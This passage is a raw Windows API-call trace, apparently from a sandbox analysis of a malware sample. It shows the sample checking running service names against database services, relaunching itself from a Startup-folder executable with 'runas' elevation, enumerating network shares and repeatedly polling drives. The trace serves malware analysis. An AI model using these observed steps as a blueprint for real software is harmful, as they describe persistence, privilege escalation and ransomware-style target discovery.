lpString2="BFE") returned 1 [0321.684] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0321.684] lstrlenW (lpString="BITS") returned 4 [0321.684] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0321.684] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0321.684] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0321.684] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0321.684] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0321.684] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0321.684] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0321.684] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0321.684] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0321.684] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0321.684] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0321.684] lstrlenW (lpString="CDPSvc") returned 6 [0321.684] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0321.684] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0321.684] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0321.685] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0321.685] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0321.685] lstrlenW (lpString="ClickToRunSvc") returned 13 [0321.685] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0321.685] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0321.685] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0321.685] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0321.685] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0321.685] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0321.685] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0321.685] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0321.685] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0321.685] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0321.685] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0321.685] lstrlenW (lpString="CryptSvc") returned 8 [0321.685] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0321.685] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0321.685] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0321.686] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0321.686] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0321.686] lstrlenW (lpString="DcomLaunch") returned 10 [0321.686] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0321.686] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0321.686] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0321.686] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0321.686] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0321.686] lstrlenW (lpString="DeviceAssociationService") returned 24 [0321.686] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0321.686] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0321.686] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0321.686] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0321.686] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0321.686] lstrlenW (lpString="Dhcp") returned 4 [0321.686] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0321.686] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0321.686] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0321.686] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0321.686] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0321.687] lstrlenW (lpString="Dnscache") returned 8 [0321.687] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0321.687] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0321.687] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0321.687] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0321.687] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0321.687] lstrlenW (lpString="DPS") returned 3 [0321.687] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0321.687] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0321.687] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0321.687] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0321.687] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0321.687] lstrlenW (lpString="DusmSvc") returned 7 [0321.687] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0321.687] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0321.687] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0321.687] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0321.687] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0321.688] lstrlenW (lpString="EventLog") returned 8 [0321.688] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0321.688] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0321.688] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0321.688] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0321.688] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0321.688] lstrlenW (lpString="EventSystem") returned 11 [0321.688] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0321.688] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0321.688] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0321.688] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0321.688] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0321.688] lstrlenW (lpString="FontCache") returned 9 [0321.688] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0321.688] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0321.688] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0321.688] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0321.688] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0321.688] lstrlenW (lpString="gpsvc") returned 5 [0321.688] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0321.689] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0321.689] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0321.689] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0321.689] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0321.689] lstrlenW (lpString="iphlpsvc") returned 8 [0321.689] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0321.689] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0321.689] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0321.689] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0321.689] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0321.689] lstrlenW (lpString="KeyIso") returned 6 [0321.689] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0321.689] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0321.689] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0321.689] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0321.689] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0321.689] lstrlenW (lpString="LanmanServer") returned 12 [0321.689] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0321.690] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0321.690] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0321.690] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0321.690] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0321.690] lstrlenW (lpString="LanmanWorkstation") returned 17 [0321.690] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0321.690] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0321.690] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0321.690] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0321.690] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0321.690] lstrlenW (lpString="lfsvc") returned 5 [0321.690] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0321.690] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0321.690] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0321.690] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0321.690] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0321.690] lstrlenW (lpString="lmhosts") returned 7 [0321.690] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0321.690] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0321.690] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0321.691] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0321.691] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0321.691] lstrlenW (lpString="LSM") returned 3 [0321.691] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0321.691] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0321.691] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0321.691] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0321.691] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0321.691] lstrlenW (lpString="MpsSvc") returned 6 [0321.691] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0321.691] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0321.691] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0321.691] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0321.691] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0321.691] lstrlenW (lpString="NcbService") returned 10 [0321.691] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0321.691] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0321.691] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0321.691] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0321.691] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0321.691] lstrlenW (lpString="netprofm") returned 8 [0321.692] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0321.692] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0321.692] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0321.692] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0321.692] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0321.692] lstrlenW (lpString="NgcSvc") returned 6 [0321.692] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0321.692] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0321.692] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0321.692] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0321.692] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0321.692] lstrlenW (lpString="NlaSvc") returned 6 [0321.692] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0321.692] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0321.692] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0321.692] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0321.692] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0321.692] lstrlenW (lpString="nsi") returned 3 [0321.692] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0321.693] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0321.693] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0321.693] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0321.693] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0321.693] lstrlenW (lpString="PcaSvc") returned 6 [0321.693] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0321.693] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0321.693] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0321.693] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0321.693] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0321.693] lstrlenW (lpString="PlugPlay") returned 8 [0321.693] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0321.693] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0321.693] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0321.693] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0321.693] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0321.693] lstrlenW (lpString="Power") returned 5 [0321.693] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0321.694] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0321.694] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0321.694] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0321.694] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0321.694] lstrlenW (lpString="ProfSvc") returned 7 [0321.694] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0321.694] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0321.694] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0321.694] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0321.694] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0321.694] lstrlenW (lpString="RpcEptMapper") returned 12 [0321.694] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0321.694] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0321.694] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0321.694] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0321.694] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0321.694] lstrlenW (lpString="RpcSs") returned 5 [0321.694] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0321.694] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0321.694] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0321.695] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0321.695] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0321.695] lstrlenW (lpString="SamSs") returned 5 [0321.695] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0321.695] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0321.695] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0321.695] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0321.696] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0321.696] lstrlenW (lpString="Schedule") returned 8 [0321.696] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0321.696] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0321.696] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0321.696] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0321.696] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0321.696] lstrlenW (lpString="SecurityHealthService") returned 21 Thread: id = 35 os_tid = 0xde8 [0280.081] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cbf28 [0280.081] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4fa3d8 [0280.081] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cbf58 [0280.081] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4cbf58, Size=0x20) returned 0x4adb10 [0280.081] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cbf40 [0280.081] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4cbf40, Size=0x20) returned 0x4adc28 [0280.081] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77a50000 [0280.082] GetProcAddress (hModule=0x77a50000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77a66b30 [0280.082] Wow64DisableWow64FsRedirection (in: OldValue=0x25cff20 | out: OldValue=0x25cff20*=0x0) returned 1 [0280.082] lstrlenW (lpString="kernel32.dll") returned 12 [0280.082] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4adb10 | out: hHeap=0x470000) returned 1 [0280.082] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0280.082] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4adc28 | out: hHeap=0x470000) returned 1 [0280.082] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4fa3d8, nSize=0x7fff | out: lpFilename="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\wdgmug.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\wdgmug.exe")) returned 0x47 [0280.124] ShellExecuteExW (pExecInfo=0x25cff2c*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\wdgmug.exe", lpParameters="-a", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) Thread: id = 36 os_tid = 0xdec [0280.085] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cbfb8 [0280.085] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4cbfb8, Size=0x20) returned 0x4ad9d0 [0280.085] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ad9d0, Size=0x40) returned 0x487868 [0280.085] GetLogicalDrives () returned 0x4 [0280.085] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x50b7f0 [0280.086] GetComputerNameW (in: lpBuffer=0x50b7f4, nSize=0x270ff64 | out: lpBuffer="NQDPDE", nSize=0x270ff64) returned 1 [0280.086] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1000) returned 0x4cf0b0 [0280.086] WNetOpenEnumW (in: dwScope=0x3, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x270ff34 | out: lphEnum=0x270ff34*=0x486630) returned 0x0 [0280.087] WNetEnumResourceW (in: hEnum=0x486630, lpcCount=0x270ff30, lpBuffer=0x4cf0b0, lpBufferSize=0x270ff38 | out: lpcCount=0x270ff30, lpBuffer=0x4cf0b0, lpBufferSize=0x270ff38) returned 0x103 [0280.088] WNetCloseEnum (hEnum=0x486630) returned 0x0 [0280.088] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x270ff34 | out: lphEnum=0x270ff34*=0x48a1f0) returned 0x0 [0280.344] WNetEnumResourceW (in: hEnum=0x48a1f0, lpcCount=0x270ff30, lpBuffer=0x4cf0b0, lpBufferSize=0x270ff38 | out: lpcCount=0x270ff30, lpBuffer=0x4cf0b0, lpBufferSize=0x270ff38) returned 0x0 [0280.344] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1000) returned 0x4cc7b8 [0280.344] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x4cf0b0, lphEnum=0x270ff08 | out: lphEnum=0x270ff08*=0x486690) returned 0x0 [0280.353] WNetEnumResourceW (in: hEnum=0x486690, lpcCount=0x270ff04, lpBuffer=0x4cc7b8, lpBufferSize=0x270ff0c | out: lpcCount=0x270ff04, lpBuffer=0x4cc7b8, lpBufferSize=0x270ff0c) returned 0x103 [0280.353] WNetCloseEnum (hEnum=0x486690) returned 0x0 [0280.353] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1000) returned 0x53b808 [0280.353] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x4cf0d0, lphEnum=0x270ff08 | out: lphEnum=0x270ff08*=0x0) returned 0x4b8 [0297.646] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1000) returned 0x38860b0 [0297.646] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x4cf0f0, lphEnum=0x270ff08 | out: lphEnum=0x270ff08*=0x0) returned 0x4c6 [0297.659] WNetEnumResourceW (in: hEnum=0x48a1f0, lpcCount=0x270ff30, lpBuffer=0x4cf0b0, lpBufferSize=0x270ff38 | out: lpcCount=0x270ff30, lpBuffer=0x4cf0b0, lpBufferSize=0x270ff38) returned 0x103 [0297.659] WNetCloseEnum (hEnum=0x48a1f0) returned 0x0 [0297.659] GetLogicalDrives () returned 0x4 [0297.659] Sleep (dwMilliseconds=0x64) [0298.236] GetLogicalDrives () returned 0x4 [0298.236] Sleep (dwMilliseconds=0x64) [0298.634] GetLogicalDrives () returned 0x4 [0298.634] Sleep (dwMilliseconds=0x64) [0299.322] GetLogicalDrives () returned 0x4 [0299.322] Sleep (dwMilliseconds=0x64) [0299.681] GetLogicalDrives () returned 0x4 [0299.681] Sleep (dwMilliseconds=0x64) [0300.172] GetLogicalDrives () returned 0x4 [0300.173] Sleep (dwMilliseconds=0x64) [0300.423] GetLogicalDrives () returned 0x4 [0300.423] Sleep (dwMilliseconds=0x64) [0300.678] GetLogicalDrives () returned 0x4 [0300.678] Sleep (dwMilliseconds=0x64) [0300.870] GetLogicalDrives () returned 0x4 [0300.870] Sleep (dwMilliseconds=0x64) [0301.015] GetLogicalDrives () returned 0x4 [0301.015] Sleep (dwMilliseconds=0x64) [0301.590] GetLogicalDrives () returned 0x4 [0301.590] Sleep (dwMilliseconds=0x64) [0303.536] GetLogicalDrives () returned 0x4 [0303.536] Sleep (dwMilliseconds=0x64) [0303.815] GetLogicalDrives () returned 0x4 [0303.815] Sleep (dwMilliseconds=0x64) [0304.029] GetLogicalDrives () returned 0x4 [0304.029] Sleep (dwMilliseconds=0x64) [0304.324] GetLogicalDrives () returned 0x4 [0304.324] Sleep (dwMilliseconds=0x64) [0304.576] GetLogicalDrives () returned 0x4 [0304.576] Sleep (dwMilliseconds=0x64) [0304.878] GetLogicalDrives () returned 0x4 [0304.878] Sleep (dwMilliseconds=0x64) [0305.122] GetLogicalDrives () returned 0x4 [0305.122] Sleep (dwMilliseconds=0x64) [0305.539] GetLogicalDrives () returned 0x4 [0305.539] Sleep (dwMilliseconds=0x64) [0305.869] GetLogicalDrives () returned 0x4 [0305.869] Sleep (dwMilliseconds=0x64) [0306.093] GetLogicalDrives () returned 0x4 [0306.093] Sleep (dwMilliseconds=0x64) [0306.400] GetLogicalDrives () returned 0x4 [0306.401] Sleep (dwMilliseconds=0x64) [0306.721] GetLogicalDrives () returned 0x4 [0306.721] Sleep (dwMilliseconds=0x64) [0307.225] GetLogicalDrives () returned 0x4 [0307.225] Sleep (dwMilliseconds=0x64) [0307.839] GetLogicalDrives () returned 0x4 [0307.839] Sleep (dwMilliseconds=0x64) [0308.336] GetLogicalDrives () returned 0x4 [0308.336] Sleep (dwMilliseconds=0x64) [0308.500] GetLogicalDrives () returned 0x4 [0308.500] Sleep (dwMilliseconds=0x64) [0308.872] GetLogicalDrives () returned 0x4 [0308.872] Sleep (dwMilliseconds=0x64) [0309.109] GetLogicalDrives () returned 0x4 [0309.111] Sleep (dwMilliseconds=0x64) [0309.419] GetLogicalDrives () returned 0x4 [0309.419] Sleep (dwMilliseconds=0x64) [0309.604] GetLogicalDrives () returned 0x4 [0309.605] Sleep (dwMilliseconds=0x64) [0310.387] GetLogicalDrives () returned 0x4 [0310.387] Sleep (dwMilliseconds=0x64) [0310.714] GetLogicalDrives () returned 0x4 [0310.714] Sleep (dwMilliseconds=0x64) [0310.841] GetLogicalDrives () returned 0x4 [0310.841] Sleep (dwMilliseconds=0x64) [0310.970] GetLogicalDrives () returned 0x4 [0310.970] Sleep (dwMilliseconds=0x64) [0311.091] GetLogicalDrives () returned 0x4 [0311.091] Sleep (dwMilliseconds=0x64) [0311.197] GetLogicalDrives () returned 0x4 [0311.197] Sleep (dwMilliseconds=0x64) [0311.339] GetLogicalDrives () returned 0x4 [0311.339] Sleep (dwMilliseconds=0x64) [0311.472] GetLogicalDrives () returned 0x4 [0311.472] Sleep (dwMilliseconds=0x64) [0311.641] GetLogicalDrives () returned 0x4 [0311.641] Sleep (dwMilliseconds=0x64) [0311.747] GetLogicalDrives () returned 0x4 [0311.747] Sleep (dwMilliseconds=0x64) [0312.234] GetLogicalDrives () returned 0x4 [0312.234] Sleep (dwMilliseconds=0x64) [0312.494] GetLogicalDrives () returned 0x4 [0312.494] Sleep (dwMilliseconds=0x64) [0312.685] GetLogicalDrives () returned 0x4 [0312.685] Sleep (dwMilliseconds=0x64) [0312.840] GetLogicalDrives () returned 0x4 [0312.841] Sleep (dwMilliseconds=0x64) [0312.951] GetLogicalDrives () returned 0x4 [0312.952] Sleep 